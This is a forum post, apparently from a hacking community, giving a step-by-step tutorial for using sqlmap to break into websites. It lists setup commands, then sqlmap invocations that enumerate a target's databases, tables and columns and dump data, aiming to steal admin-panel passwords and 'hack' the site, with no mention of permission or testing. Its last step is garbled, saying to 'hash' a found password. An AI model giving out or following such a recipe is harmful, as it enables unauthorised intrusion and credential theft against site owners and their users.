- Thread Author
- #1
how to use sqlmap and hack sites
first, you should download "Kali Linux" from Microsoft Store.
You must be registered for see links
then open Kali Linux and setup. (if it asks for "sudo password" make it something u won't forget)
after that you will get a screen like this:
type:
cd Desktop
sudo apt install python3
sudo apt install git
sudo apt update
sudo apt upgrade
(press Y if asks questions like Do you want to continue? [Y/n])
well now our terminal is ready.
type:
git clone
You must be registered for see links
cd sqlmap
now we are in the sqlmap folder.
type:
python3 sqlmap.py -u (site with sql injection) --dbs
(press Y everytime when it asks questions like Do you want to continue? [Y/n]
after a while sqlmap will give us databases of site.
you will get a screen like this:
we won't going to use information_schema database so we'll type the other databases name
(every site has information_schema database)
type:
python3 sqlmap.py -u (site with sql injection) -D (database name) --tables
sqlmap will give us database's tables
you will get a screen like this:
now you have to guess which table has the admin panels information
type:
python3 sqlmap.py -u (site with sql injection) -D (database name) -T (table name) --column
sqlmap will give you database's table's columns
you will get a screen like this:
now we have to dump columns datas so pick a column you think admin panel infos might be in
type:
python3 sqlmap.py -u (site with sql injection) -D (database name) -T (table name) -C (column name) --dump
sqlmap will dump the data's for you
you will get a screen like this:
the site used has no admin panel so i couldn't find any adminpanel passwords or something. but if you found all you have to do is find sites admin panel and hash the password. And then you hacked site!